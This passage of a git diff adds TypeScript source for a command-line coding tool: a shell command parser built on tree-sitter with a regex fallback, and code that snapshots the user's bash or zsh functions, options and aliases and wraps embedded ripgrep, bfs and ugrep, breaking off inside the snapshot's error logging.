init claude-code
This commit is contained in:
@@ -0,0 +1,318 @@
|
||||
import memoize from 'lodash-es/memoize.js'
|
||||
import {
|
||||
extractOutputRedirections,
|
||||
splitCommandWithOperators,
|
||||
} from './commands.js'
|
||||
import type { Node } from './parser.js'
|
||||
import {
|
||||
analyzeCommand,
|
||||
type TreeSitterAnalysis,
|
||||
} from './treeSitterAnalysis.js'
|
||||
|
||||
export type OutputRedirection = {
|
||||
target: string
|
||||
operator: '>' | '>>'
|
||||
}
|
||||
|
||||
/**
|
||||
* Interface for parsed command implementations.
|
||||
* Both tree-sitter and regex fallback implementations conform to this.
|
||||
*/
|
||||
export interface IParsedCommand {
|
||||
readonly originalCommand: string
|
||||
toString(): string
|
||||
getPipeSegments(): string[]
|
||||
withoutOutputRedirections(): string
|
||||
getOutputRedirections(): OutputRedirection[]
|
||||
/**
|
||||
* Returns tree-sitter analysis data if available.
|
||||
* Returns null for the regex fallback implementation.
|
||||
*/
|
||||
getTreeSitterAnalysis(): TreeSitterAnalysis | null
|
||||
}
|
||||
|
||||
/**
|
||||
* @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
|
||||
* unavailable. The primary gate is parseForSecurity (ast.ts).
|
||||
*
|
||||
* Regex-based fallback implementation using shell-quote parser.
|
||||
* Used when tree-sitter is not available.
|
||||
* Exported for testing purposes.
|
||||
*/
|
||||
export class RegexParsedCommand_DEPRECATED implements IParsedCommand {
|
||||
readonly originalCommand: string
|
||||
|
||||
constructor(command: string) {
|
||||
this.originalCommand = command
|
||||
}
|
||||
|
||||
toString(): string {
|
||||
return this.originalCommand
|
||||
}
|
||||
|
||||
getPipeSegments(): string[] {
|
||||
try {
|
||||
const parts = splitCommandWithOperators(this.originalCommand)
|
||||
const segments: string[] = []
|
||||
let currentSegment: string[] = []
|
||||
|
||||
for (const part of parts) {
|
||||
if (part === '|') {
|
||||
if (currentSegment.length > 0) {
|
||||
segments.push(currentSegment.join(' '))
|
||||
currentSegment = []
|
||||
}
|
||||
} else {
|
||||
currentSegment.push(part)
|
||||
}
|
||||
}
|
||||
|
||||
if (currentSegment.length > 0) {
|
||||
segments.push(currentSegment.join(' '))
|
||||
}
|
||||
|
||||
return segments.length > 0 ? segments : [this.originalCommand]
|
||||
} catch {
|
||||
return [this.originalCommand]
|
||||
}
|
||||
}
|
||||
|
||||
withoutOutputRedirections(): string {
|
||||
if (!this.originalCommand.includes('>')) {
|
||||
return this.originalCommand
|
||||
}
|
||||
const { commandWithoutRedirections, redirections } =
|
||||
extractOutputRedirections(this.originalCommand)
|
||||
return redirections.length > 0
|
||||
? commandWithoutRedirections
|
||||
: this.originalCommand
|
||||
}
|
||||
|
||||
getOutputRedirections(): OutputRedirection[] {
|
||||
const { redirections } = extractOutputRedirections(this.originalCommand)
|
||||
return redirections
|
||||
}
|
||||
|
||||
getTreeSitterAnalysis(): TreeSitterAnalysis | null {
|
||||
return null
|
||||
}
|
||||
}
|
||||
|
||||
type RedirectionNode = OutputRedirection & {
|
||||
startIndex: number
|
||||
endIndex: number
|
||||
}
|
||||
|
||||
function visitNodes(node: Node, visitor: (node: Node) => void): void {
|
||||
visitor(node)
|
||||
for (const child of node.children) {
|
||||
visitNodes(child, visitor)
|
||||
}
|
||||
}
|
||||
|
||||
function extractPipePositions(rootNode: Node): number[] {
|
||||
const pipePositions: number[] = []
|
||||
visitNodes(rootNode, node => {
|
||||
if (node.type === 'pipeline') {
|
||||
for (const child of node.children) {
|
||||
if (child.type === '|') {
|
||||
pipePositions.push(child.startIndex)
|
||||
}
|
||||
}
|
||||
}
|
||||
})
|
||||
// visitNodes is depth-first. For `a | b && c | d`, the outer `list` nests
|
||||
// the second pipeline as a sibling of the first, so the outer `|` is
|
||||
// visited before the inner one — positions arrive out of order.
|
||||
// getPipeSegments iterates them to slice left-to-right, so sort here.
|
||||
return pipePositions.sort((a, b) => a - b)
|
||||
}
|
||||
|
||||
function extractRedirectionNodes(rootNode: Node): RedirectionNode[] {
|
||||
const redirections: RedirectionNode[] = []
|
||||
visitNodes(rootNode, node => {
|
||||
if (node.type === 'file_redirect') {
|
||||
const children = node.children
|
||||
const op = children.find(c => c.type === '>' || c.type === '>>')
|
||||
const target = children.find(c => c.type === 'word')
|
||||
if (op && target) {
|
||||
redirections.push({
|
||||
startIndex: node.startIndex,
|
||||
endIndex: node.endIndex,
|
||||
target: target.text,
|
||||
operator: op.type as '>' | '>>',
|
||||
})
|
||||
}
|
||||
}
|
||||
})
|
||||
return redirections
|
||||
}
|
||||
|
||||
class TreeSitterParsedCommand implements IParsedCommand {
|
||||
readonly originalCommand: string
|
||||
// Tree-sitter's startIndex/endIndex are UTF-8 byte offsets, but JS
|
||||
// String.slice() uses UTF-16 code-unit indices. For ASCII they coincide;
|
||||
// for multi-byte code points (e.g. `—` U+2014: 3 UTF-8 bytes, 1 code unit)
|
||||
// they diverge and slicing the string directly lands mid-token. Slicing
|
||||
// the UTF-8 Buffer with tree-sitter's byte offsets and decoding back to
|
||||
// string is correct regardless of code-point width.
|
||||
private readonly commandBytes: Buffer
|
||||
private readonly pipePositions: number[]
|
||||
private readonly redirectionNodes: RedirectionNode[]
|
||||
private readonly treeSitterAnalysis: TreeSitterAnalysis
|
||||
|
||||
constructor(
|
||||
command: string,
|
||||
pipePositions: number[],
|
||||
redirectionNodes: RedirectionNode[],
|
||||
treeSitterAnalysis: TreeSitterAnalysis,
|
||||
) {
|
||||
this.originalCommand = command
|
||||
this.commandBytes = Buffer.from(command, 'utf8')
|
||||
this.pipePositions = pipePositions
|
||||
this.redirectionNodes = redirectionNodes
|
||||
this.treeSitterAnalysis = treeSitterAnalysis
|
||||
}
|
||||
|
||||
toString(): string {
|
||||
return this.originalCommand
|
||||
}
|
||||
|
||||
getPipeSegments(): string[] {
|
||||
if (this.pipePositions.length === 0) {
|
||||
return [this.originalCommand]
|
||||
}
|
||||
|
||||
const segments: string[] = []
|
||||
let currentStart = 0
|
||||
|
||||
for (const pipePos of this.pipePositions) {
|
||||
const segment = this.commandBytes
|
||||
.subarray(currentStart, pipePos)
|
||||
.toString('utf8')
|
||||
.trim()
|
||||
if (segment) {
|
||||
segments.push(segment)
|
||||
}
|
||||
currentStart = pipePos + 1
|
||||
}
|
||||
|
||||
const lastSegment = this.commandBytes
|
||||
.subarray(currentStart)
|
||||
.toString('utf8')
|
||||
.trim()
|
||||
if (lastSegment) {
|
||||
segments.push(lastSegment)
|
||||
}
|
||||
|
||||
return segments
|
||||
}
|
||||
|
||||
withoutOutputRedirections(): string {
|
||||
if (this.redirectionNodes.length === 0) return this.originalCommand
|
||||
|
||||
const sorted = [...this.redirectionNodes].sort(
|
||||
(a, b) => b.startIndex - a.startIndex,
|
||||
)
|
||||
|
||||
let result = this.commandBytes
|
||||
for (const redir of sorted) {
|
||||
result = Buffer.concat([
|
||||
result.subarray(0, redir.startIndex),
|
||||
result.subarray(redir.endIndex),
|
||||
])
|
||||
}
|
||||
return result.toString('utf8').trim().replace(/\s+/g, ' ')
|
||||
}
|
||||
|
||||
getOutputRedirections(): OutputRedirection[] {
|
||||
return this.redirectionNodes.map(({ target, operator }) => ({
|
||||
target,
|
||||
operator,
|
||||
}))
|
||||
}
|
||||
|
||||
getTreeSitterAnalysis(): TreeSitterAnalysis {
|
||||
return this.treeSitterAnalysis
|
||||
}
|
||||
}
|
||||
|
||||
const getTreeSitterAvailable = memoize(async (): Promise<boolean> => {
|
||||
try {
|
||||
const { parseCommand } = await import('./parser.js')
|
||||
const testResult = await parseCommand('echo test')
|
||||
return testResult !== null
|
||||
} catch {
|
||||
return false
|
||||
}
|
||||
})
|
||||
|
||||
/**
|
||||
* Build a TreeSitterParsedCommand from a pre-parsed AST root. Lets callers
|
||||
* that already have the tree skip the redundant native.parse that
|
||||
* ParsedCommand.parse would do.
|
||||
*/
|
||||
export function buildParsedCommandFromRoot(
|
||||
command: string,
|
||||
root: Node,
|
||||
): IParsedCommand {
|
||||
const pipePositions = extractPipePositions(root)
|
||||
const redirectionNodes = extractRedirectionNodes(root)
|
||||
const analysis = analyzeCommand(root, command)
|
||||
return new TreeSitterParsedCommand(
|
||||
command,
|
||||
pipePositions,
|
||||
redirectionNodes,
|
||||
analysis,
|
||||
)
|
||||
}
|
||||
|
||||
async function doParse(command: string): Promise<IParsedCommand | null> {
|
||||
if (!command) return null
|
||||
|
||||
const treeSitterAvailable = await getTreeSitterAvailable()
|
||||
if (treeSitterAvailable) {
|
||||
try {
|
||||
const { parseCommand } = await import('./parser.js')
|
||||
const data = await parseCommand(command)
|
||||
if (data) {
|
||||
// Native NAPI parser returns plain JS objects (no WASM handles);
|
||||
// nothing to free — extract directly.
|
||||
return buildParsedCommandFromRoot(command, data.rootNode)
|
||||
}
|
||||
} catch {
|
||||
// Fall through to regex implementation
|
||||
}
|
||||
}
|
||||
|
||||
// Fallback to regex implementation
|
||||
return new RegexParsedCommand_DEPRECATED(command)
|
||||
}
|
||||
|
||||
// Single-entry cache: legacy callers (bashCommandIsSafeAsync,
|
||||
// buildSegmentWithoutRedirections) may call ParsedCommand.parse repeatedly
|
||||
// with the same command string. Each parse() is ~1 native.parse + ~6 tree
|
||||
// walks, so caching the most recent command skips the redundant work.
|
||||
// Size-1 bound avoids leaking TreeSitterParsedCommand instances.
|
||||
let lastCmd: string | undefined
|
||||
let lastResult: Promise<IParsedCommand | null> | undefined
|
||||
|
||||
/**
|
||||
* ParsedCommand provides methods for working with shell commands.
|
||||
* Uses tree-sitter when available for quote-aware parsing,
|
||||
* falls back to regex-based parsing otherwise.
|
||||
*/
|
||||
export const ParsedCommand = {
|
||||
/**
|
||||
* Parse a command string and return a ParsedCommand instance.
|
||||
* Returns null if parsing fails completely.
|
||||
*/
|
||||
parse(command: string): Promise<IParsedCommand | null> {
|
||||
if (command === lastCmd && lastResult !== undefined) {
|
||||
return lastResult
|
||||
}
|
||||
lastCmd = command
|
||||
lastResult = doParse(command)
|
||||
return lastResult
|
||||
},
|
||||
}
|
||||
@@ -0,0 +1,582 @@
|
||||
import { execFile } from 'child_process'
|
||||
import { execa } from 'execa'
|
||||
import { mkdir, stat } from 'fs/promises'
|
||||
import * as os from 'os'
|
||||
import { join } from 'path'
|
||||
import { logEvent } from 'src/services/analytics/index.js'
|
||||
import { registerCleanup } from '../cleanupRegistry.js'
|
||||
import { getCwd } from '../cwd.js'
|
||||
import { logForDebugging } from '../debug.js'
|
||||
import {
|
||||
embeddedSearchToolsBinaryPath,
|
||||
hasEmbeddedSearchTools,
|
||||
} from '../embeddedTools.js'
|
||||
import { getClaudeConfigHomeDir } from '../envUtils.js'
|
||||
import { pathExists } from '../file.js'
|
||||
import { getFsImplementation } from '../fsOperations.js'
|
||||
import { logError } from '../log.js'
|
||||
import { getPlatform } from '../platform.js'
|
||||
import { ripgrepCommand } from '../ripgrep.js'
|
||||
import { subprocessEnv } from '../subprocessEnv.js'
|
||||
import { quote } from './shellQuote.js'
|
||||
|
||||
const LITERAL_BACKSLASH = '\\'
|
||||
const SNAPSHOT_CREATION_TIMEOUT = 10000 // 10 seconds
|
||||
|
||||
/**
|
||||
* Creates a shell function that invokes `binaryPath` with a specific argv[0].
|
||||
* This uses the bun-internal ARGV0 dispatch trick: the bun binary checks its
|
||||
* argv[0] and runs the embedded tool (rg, bfs, ugrep) that matches.
|
||||
*
|
||||
* @param prependArgs - Arguments to inject before the user's args (e.g.,
|
||||
* default flags). Injected literally; each element must be a valid shell
|
||||
* word (no spaces/special chars).
|
||||
*/
|
||||
function createArgv0ShellFunction(
|
||||
funcName: string,
|
||||
argv0: string,
|
||||
binaryPath: string,
|
||||
prependArgs: string[] = [],
|
||||
): string {
|
||||
const quotedPath = quote([binaryPath])
|
||||
const argSuffix =
|
||||
prependArgs.length > 0 ? `${prependArgs.join(' ')} "$@"` : '"$@"'
|
||||
return [
|
||||
`function ${funcName} {`,
|
||||
' if [[ -n $ZSH_VERSION ]]; then',
|
||||
` ARGV0=${argv0} ${quotedPath} ${argSuffix}`,
|
||||
' elif [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]] || [[ "$OSTYPE" == "win32" ]]; then',
|
||||
// On Windows (git bash), exec -a does not work, so use ARGV0 env var instead
|
||||
// The bun binary reads from ARGV0 natively to set argv[0]
|
||||
` ARGV0=${argv0} ${quotedPath} ${argSuffix}`,
|
||||
' elif [[ $BASHPID != $$ ]]; then',
|
||||
` exec -a ${argv0} ${quotedPath} ${argSuffix}`,
|
||||
' else',
|
||||
` (exec -a ${argv0} ${quotedPath} ${argSuffix})`,
|
||||
' fi',
|
||||
'}',
|
||||
].join('\n')
|
||||
}
|
||||
|
||||
/**
|
||||
* Creates ripgrep shell integration (alias or function)
|
||||
* @returns Object with type and the shell snippet to use
|
||||
*/
|
||||
export function createRipgrepShellIntegration(): {
|
||||
type: 'alias' | 'function'
|
||||
snippet: string
|
||||
} {
|
||||
const rgCommand = ripgrepCommand()
|
||||
|
||||
// For embedded ripgrep (bun-internal), we need a shell function that sets argv0
|
||||
if (rgCommand.argv0) {
|
||||
return {
|
||||
type: 'function',
|
||||
snippet: createArgv0ShellFunction(
|
||||
'rg',
|
||||
rgCommand.argv0,
|
||||
rgCommand.rgPath,
|
||||
),
|
||||
}
|
||||
}
|
||||
|
||||
// For regular ripgrep, use a simple alias target
|
||||
const quotedPath = quote([rgCommand.rgPath])
|
||||
const quotedArgs = rgCommand.rgArgs.map(arg => quote([arg]))
|
||||
const aliasTarget =
|
||||
rgCommand.rgArgs.length > 0
|
||||
? `${quotedPath} ${quotedArgs.join(' ')}`
|
||||
: quotedPath
|
||||
|
||||
return { type: 'alias', snippet: aliasTarget }
|
||||
}
|
||||
|
||||
/**
|
||||
* VCS directories to exclude from grep searches. Matches the list in
|
||||
* GrepTool (see GrepTool.ts: VCS_DIRECTORIES_TO_EXCLUDE).
|
||||
*/
|
||||
const VCS_DIRECTORIES_TO_EXCLUDE = [
|
||||
'.git',
|
||||
'.svn',
|
||||
'.hg',
|
||||
'.bzr',
|
||||
'.jj',
|
||||
'.sl',
|
||||
] as const
|
||||
|
||||
/**
|
||||
* Creates shell integration for `find` and `grep`, backed by bfs and ugrep
|
||||
* embedded in the bun binary (ant-native only). Unlike the rg integration,
|
||||
* this always shadows the system find/grep since bfs/ugrep are drop-in
|
||||
* replacements and we want consistent fast behavior.
|
||||
*
|
||||
* These wrappers replace the GlobTool/GrepTool dedicated tools (which are
|
||||
* removed from the tool registry when embedded search tools are available),
|
||||
* so they're tuned to match those tools' semantics, not GNU find/grep.
|
||||
*
|
||||
* `find` ↔ GlobTool:
|
||||
* - Inject `-regextype findutils-default`: bfs defaults to POSIX BRE for
|
||||
* -regex, but GNU find defaults to emacs-flavor (which supports `\|`
|
||||
* alternation). Without this, `find . -regex '.*\.\(js\|ts\)'` silently
|
||||
* returns zero results. A later user-supplied -regextype still overrides.
|
||||
* - No gitignore filtering: GlobTool passes `--no-ignore` to rg. bfs has no
|
||||
* gitignore support anyway, so this matches by default.
|
||||
* - Hidden files included: both GlobTool (`--hidden`) and bfs's default.
|
||||
*
|
||||
* Caveat: even with findutils-default, Oniguruma (bfs's regex engine) uses
|
||||
* leftmost-first alternation, not POSIX leftmost-longest. Patterns where
|
||||
* one alternative is a prefix of another (e.g., `\(ts\|tsx\)`) may miss
|
||||
* matches that GNU find catches. Workaround: put the longer alternative first.
|
||||
*
|
||||
* `grep` ↔ GrepTool (file filtering) + GNU grep (regex syntax):
|
||||
* - `-G` (basic regex / BRE): GNU grep defaults to BRE where `\|` is
|
||||
* alternation. ugrep defaults to ERE where `|` is alternation and `\|` is a
|
||||
* literal pipe. Without -G, `grep "foo\|bar"` silently returns zero results.
|
||||
* User-supplied `-E`, `-F`, or `-P` later in argv overrides this.
|
||||
* - `--ignore-files`: respect .gitignore (GrepTool uses rg's default, which
|
||||
* respects gitignore). Override with `grep --no-ignore-files`.
|
||||
* - `--hidden`: include hidden files (GrepTool passes `--hidden` to rg).
|
||||
* Override with `grep --no-hidden`.
|
||||
* - `--exclude-dir` for VCS dirs: GrepTool passes `--glob '!.git'` etc. to rg.
|
||||
* - `-I`: skip binary files. rg's recursion silently skips binary matches
|
||||
* by default (different from direct-file-arg behavior); ugrep doesn't, so
|
||||
* we inject -I to match. Override with `grep -a`.
|
||||
*
|
||||
* Not replicated from GrepTool:
|
||||
* - `--max-columns 500`: ugrep's `--width` hard-truncates output which could
|
||||
* break pipelines; rg's version replaces the line with a placeholder.
|
||||
* - Read deny rules / plugin cache exclusions: require toolPermissionContext
|
||||
* which isn't available at shell-snapshot creation time.
|
||||
*
|
||||
* Returns null if embedded search tools are not available in this build.
|
||||
*/
|
||||
export function createFindGrepShellIntegration(): string | null {
|
||||
if (!hasEmbeddedSearchTools()) {
|
||||
return null
|
||||
}
|
||||
const binaryPath = embeddedSearchToolsBinaryPath()
|
||||
return [
|
||||
// User shell configs may define aliases like `alias find=gfind` or
|
||||
// `alias grep=ggrep` (common on macOS with Homebrew GNU tools). The
|
||||
// snapshot sources user aliases before these function definitions, and
|
||||
// bash expands aliases before function lookup — so a renaming alias
|
||||
// would silently bypass the embedded bfs/ugrep dispatch. Clear them first
|
||||
// (same fix the rg integration uses).
|
||||
'unalias find 2>/dev/null || true',
|
||||
'unalias grep 2>/dev/null || true',
|
||||
createArgv0ShellFunction('find', 'bfs', binaryPath, [
|
||||
'-regextype',
|
||||
'findutils-default',
|
||||
]),
|
||||
createArgv0ShellFunction('grep', 'ugrep', binaryPath, [
|
||||
'-G',
|
||||
'--ignore-files',
|
||||
'--hidden',
|
||||
'-I',
|
||||
...VCS_DIRECTORIES_TO_EXCLUDE.map(d => `--exclude-dir=${d}`),
|
||||
]),
|
||||
].join('\n')
|
||||
}
|
||||
|
||||
function getConfigFile(shellPath: string): string {
|
||||
const fileName = shellPath.includes('zsh')
|
||||
? '.zshrc'
|
||||
: shellPath.includes('bash')
|
||||
? '.bashrc'
|
||||
: '.profile'
|
||||
|
||||
const configPath = join(os.homedir(), fileName)
|
||||
|
||||
return configPath
|
||||
}
|
||||
|
||||
/**
|
||||
* Generates user-specific snapshot content (functions, options, aliases)
|
||||
* This content is derived from the user's shell configuration file
|
||||
*/
|
||||
function getUserSnapshotContent(configFile: string): string {
|
||||
const isZsh = configFile.endsWith('.zshrc')
|
||||
|
||||
let content = ''
|
||||
|
||||
// User functions
|
||||
if (isZsh) {
|
||||
content += `
|
||||
echo "# Functions" >> "$SNAPSHOT_FILE"
|
||||
|
||||
# Force autoload all functions first
|
||||
typeset -f > /dev/null 2>&1
|
||||
|
||||
# Now get user function names - filter completion functions (single underscore prefix)
|
||||
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
|
||||
typeset +f | grep -vE '^_[^_]' | while read func; do
|
||||
typeset -f "$func" >> "$SNAPSHOT_FILE"
|
||||
done
|
||||
`
|
||||
} else {
|
||||
content += `
|
||||
echo "# Functions" >> "$SNAPSHOT_FILE"
|
||||
|
||||
# Force autoload all functions first
|
||||
declare -f > /dev/null 2>&1
|
||||
|
||||
# Now get user function names - filter completion functions (single underscore prefix)
|
||||
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
|
||||
declare -F | cut -d' ' -f3 | grep -vE '^_[^_]' | while read func; do
|
||||
# Encode the function to base64, preserving all special characters
|
||||
encoded_func=$(declare -f "$func" | base64 )
|
||||
# Write the function definition to the snapshot
|
||||
echo "eval ${LITERAL_BACKSLASH}"${LITERAL_BACKSLASH}$(echo '$encoded_func' | base64 -d)${LITERAL_BACKSLASH}" > /dev/null 2>&1" >> "$SNAPSHOT_FILE"
|
||||
done
|
||||
`
|
||||
}
|
||||
|
||||
// Shell options
|
||||
if (isZsh) {
|
||||
content += `
|
||||
echo "# Shell Options" >> "$SNAPSHOT_FILE"
|
||||
setopt | sed 's/^/setopt /' | head -n 1000 >> "$SNAPSHOT_FILE"
|
||||
`
|
||||
} else {
|
||||
content += `
|
||||
echo "# Shell Options" >> "$SNAPSHOT_FILE"
|
||||
shopt -p | head -n 1000 >> "$SNAPSHOT_FILE"
|
||||
set -o | grep "on" | awk '{print "set -o " $1}' | head -n 1000 >> "$SNAPSHOT_FILE"
|
||||
echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"
|
||||
`
|
||||
}
|
||||
|
||||
// User aliases
|
||||
content += `
|
||||
echo "# Aliases" >> "$SNAPSHOT_FILE"
|
||||
# Filter out winpty aliases on Windows to avoid "stdin is not a tty" errors
|
||||
# Git Bash automatically creates aliases like "alias node='winpty node.exe'" for
|
||||
# programs that need Win32 Console in mintty, but winpty fails when there's no TTY
|
||||
if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
|
||||
alias | grep -v "='winpty " | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
|
||||
else
|
||||
alias | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
|
||||
fi
|
||||
`
|
||||
|
||||
return content
|
||||
}
|
||||
|
||||
/**
|
||||
* Generates Claude Code specific snapshot content
|
||||
* This content is always included regardless of user configuration
|
||||
*/
|
||||
async function getClaudeCodeSnapshotContent(): Promise<string> {
|
||||
// Get the appropriate PATH based on platform
|
||||
let pathValue = process.env.PATH
|
||||
if (getPlatform() === 'windows') {
|
||||
// On Windows with git-bash, read the Cygwin PATH
|
||||
const cygwinResult = await execa('echo $PATH', {
|
||||
shell: true,
|
||||
reject: false,
|
||||
})
|
||||
if (cygwinResult.exitCode === 0 && cygwinResult.stdout) {
|
||||
pathValue = cygwinResult.stdout.trim()
|
||||
}
|
||||
// Fall back to process.env.PATH if we can't get Cygwin PATH
|
||||
}
|
||||
|
||||
const rgIntegration = createRipgrepShellIntegration()
|
||||
|
||||
let content = ''
|
||||
|
||||
// Check if rg is available, if not create an alias/function to bundled ripgrep
|
||||
// We use a subshell to unalias rg before checking, so that user aliases like
|
||||
// `alias rg='rg --smart-case'` don't shadow the real binary check. The subshell
|
||||
// ensures we don't modify the user's aliases in the parent shell.
|
||||
content += `
|
||||
# Check for rg availability
|
||||
echo "# Check for rg availability" >> "$SNAPSHOT_FILE"
|
||||
echo "if ! (unalias rg 2>/dev/null; command -v rg) >/dev/null 2>&1; then" >> "$SNAPSHOT_FILE"
|
||||
`
|
||||
|
||||
if (rgIntegration.type === 'function') {
|
||||
// For embedded ripgrep, write the function definition using heredoc
|
||||
content += `
|
||||
cat >> "$SNAPSHOT_FILE" << 'RIPGREP_FUNC_END'
|
||||
${rgIntegration.snippet}
|
||||
RIPGREP_FUNC_END
|
||||
`
|
||||
} else {
|
||||
// For regular ripgrep, write a simple alias
|
||||
const escapedSnippet = rgIntegration.snippet.replace(/'/g, "'\\''")
|
||||
content += `
|
||||
echo ' alias rg='"'${escapedSnippet}'" >> "$SNAPSHOT_FILE"
|
||||
`
|
||||
}
|
||||
|
||||
content += `
|
||||
echo "fi" >> "$SNAPSHOT_FILE"
|
||||
`
|
||||
|
||||
// For ant-native builds, shadow find/grep with bfs/ugrep embedded in the bun
|
||||
// binary. Unlike rg (which only activates if system rg is absent), we always
|
||||
// shadow find/grep since bfs/ugrep are drop-in replacements and we want
|
||||
// consistent fast behavior in Claude's shell.
|
||||
const findGrepIntegration = createFindGrepShellIntegration()
|
||||
if (findGrepIntegration !== null) {
|
||||
content += `
|
||||
# Shadow find/grep with embedded bfs/ugrep (ant-native only)
|
||||
echo "# Shadow find/grep with embedded bfs/ugrep" >> "$SNAPSHOT_FILE"
|
||||
cat >> "$SNAPSHOT_FILE" << 'FIND_GREP_FUNC_END'
|
||||
${findGrepIntegration}
|
||||
FIND_GREP_FUNC_END
|
||||
`
|
||||
}
|
||||
|
||||
// Add PATH to the file
|
||||
content += `
|
||||
|
||||
# Add PATH to the file
|
||||
echo "export PATH=${quote([pathValue || ''])}" >> "$SNAPSHOT_FILE"
|
||||
`
|
||||
|
||||
return content
|
||||
}
|
||||
|
||||
/**
|
||||
* Creates the appropriate shell script for capturing environment
|
||||
*/
|
||||
async function getSnapshotScript(
|
||||
shellPath: string,
|
||||
snapshotFilePath: string,
|
||||
configFileExists: boolean,
|
||||
): Promise<string> {
|
||||
const configFile = getConfigFile(shellPath)
|
||||
const isZsh = configFile.endsWith('.zshrc')
|
||||
|
||||
// Generate the user content and Claude Code content
|
||||
const userContent = configFileExists
|
||||
? getUserSnapshotContent(configFile)
|
||||
: !isZsh
|
||||
? // we need to manually force alias expansion in bash - normally `getUserSnapshotContent` takes care of this
|
||||
'echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"'
|
||||
: ''
|
||||
const claudeCodeContent = await getClaudeCodeSnapshotContent()
|
||||
|
||||
const script = `SNAPSHOT_FILE=${quote([snapshotFilePath])}
|
||||
${configFileExists ? `source "${configFile}" < /dev/null` : '# No user config file to source'}
|
||||
|
||||
# First, create/clear the snapshot file
|
||||
echo "# Snapshot file" >| "$SNAPSHOT_FILE"
|
||||
|
||||
# When this file is sourced, we first unalias to avoid conflicts
|
||||
# This is necessary because aliases get "frozen" inside function definitions at definition time,
|
||||
# which can cause unexpected behavior when functions use commands that conflict with aliases
|
||||
echo "# Unset all aliases to avoid conflicts with functions" >> "$SNAPSHOT_FILE"
|
||||
echo "unalias -a 2>/dev/null || true" >> "$SNAPSHOT_FILE"
|
||||
|
||||
${userContent}
|
||||
|
||||
${claudeCodeContent}
|
||||
|
||||
# Exit silently on success, only report errors
|
||||
if [ ! -f "$SNAPSHOT_FILE" ]; then
|
||||
echo "Error: Snapshot file was not created at $SNAPSHOT_FILE" >&2
|
||||
exit 1
|
||||
fi
|
||||
`
|
||||
|
||||
return script
|
||||
}
|
||||
|
||||
/**
|
||||
* Creates and saves the shell environment snapshot by loading the user's shell configuration
|
||||
*
|
||||
* This function is a critical part of Claude CLI's shell integration strategy. It:
|
||||
*
|
||||
* 1. Identifies the user's shell config file (.zshrc, .bashrc, etc.)
|
||||
* 2. Creates a temporary script that sources this configuration file
|
||||
* 3. Captures the resulting shell environment state including:
|
||||
* - Functions defined in the user's shell configuration
|
||||
* - Shell options and settings that affect command behavior
|
||||
* - Aliases that the user has defined
|
||||
*
|
||||
* The snapshot is saved to a temporary file that can be sourced by subsequent shell
|
||||
* commands, ensuring they run with the user's expected environment, aliases, and functions.
|
||||
*
|
||||
* This approach allows Claude CLI to execute commands as if they were run in the user's
|
||||
* interactive shell, while avoiding the overhead of creating a new login shell for each command.
|
||||
* It handles both Bash and Zsh shells with their different syntax for functions, options, and aliases.
|
||||
*
|
||||
* If the snapshot creation fails (e.g., timeout, permissions issues), the CLI will still
|
||||
* function but without the user's custom shell environment, potentially missing aliases
|
||||
* and functions the user relies on.
|
||||
*
|
||||
* @returns Promise that resolves to the snapshot file path or undefined if creation failed
|
||||
*/
|
||||
export const createAndSaveSnapshot = async (
|
||||
binShell: string,
|
||||
): Promise<string | undefined> => {
|
||||
const shellType = binShell.includes('zsh')
|
||||
? 'zsh'
|
||||
: binShell.includes('bash')
|
||||
? 'bash'
|
||||
: 'sh'
|
||||
|
||||
logForDebugging(`Creating shell snapshot for ${shellType} (${binShell})`)
|
||||
|
||||
return new Promise(async resolve => {
|
||||
try {
|
||||
const configFile = getConfigFile(binShell)
|
||||
logForDebugging(`Looking for shell config file: ${configFile}`)
|
||||
const configFileExists = await pathExists(configFile)
|
||||
|
||||
if (!configFileExists) {
|
||||
logForDebugging(
|
||||
`Shell config file not found: ${configFile}, creating snapshot with Claude Code defaults only`,
|
||||
)
|
||||
}
|
||||
|
||||
// Create unique snapshot path with timestamp and random ID
|
||||
const timestamp = Date.now()
|
||||
const randomId = Math.random().toString(36).substring(2, 8)
|
||||
const snapshotsDir = join(getClaudeConfigHomeDir(), 'shell-snapshots')
|
||||
logForDebugging(`Snapshots directory: ${snapshotsDir}`)
|
||||
const shellSnapshotPath = join(
|
||||
snapshotsDir,
|
||||
`snapshot-${shellType}-${timestamp}-${randomId}.sh`,
|
||||
)
|
||||
|
||||
// Ensure snapshots directory exists
|
||||
await mkdir(snapshotsDir, { recursive: true })
|
||||
|
||||
const snapshotScript = await getSnapshotScript(
|
||||
binShell,
|
||||
shellSnapshotPath,
|
||||
configFileExists,
|
||||
)
|
||||
logForDebugging(`Creating snapshot at: ${shellSnapshotPath}`)
|
||||
logForDebugging(`Execution timeout: ${SNAPSHOT_CREATION_TIMEOUT}ms`)
|
||||
execFile(
|
||||
binShell,
|
||||
['-c', '-l', snapshotScript],
|
||||
{
|
||||
env: {
|
||||
...((process.env.CLAUDE_CODE_DONT_INHERIT_ENV
|
||||
? {}
|
||||
: subprocessEnv()) as typeof process.env),
|
||||
SHELL: binShell,
|
||||
GIT_EDITOR: 'true',
|
||||
CLAUDECODE: '1',
|
||||
},
|
||||
timeout: SNAPSHOT_CREATION_TIMEOUT,
|
||||
maxBuffer: 1024 * 1024, // 1MB buffer
|
||||
encoding: 'utf8',
|
||||
},
|
||||
async (error, stdout, stderr) => {
|
||||
if (error) {
|
||||
const execError = error as Error & {
|
||||
killed?: boolean
|
||||
signal?: string
|
||||
code?: number
|
||||
}
|
||||
logForDebugging(`Shell snapshot creation failed: ${error.message}`)
|
||||
logForDebugging(`Error details:`)
|
||||
logForDebugging(` - Error code: ${execError?.code}`)
|
||||
logForDebugging(` - Error signal: ${execError?.signal}`)
|
||||
logForDebugging(` - Error killed: ${execError?.killed}`)
|
||||
logForDebugging(` - Shell path: ${binShell}`)
|
||||
logForDebugging(` - Config file: ${getConfigFile(binShell)}`)
|
||||
logForDebugging(` - Config file exists: ${configFileExists}`)
|
||||
logForDebugging(` - Working directory: ${getCwd()}`)
|
||||
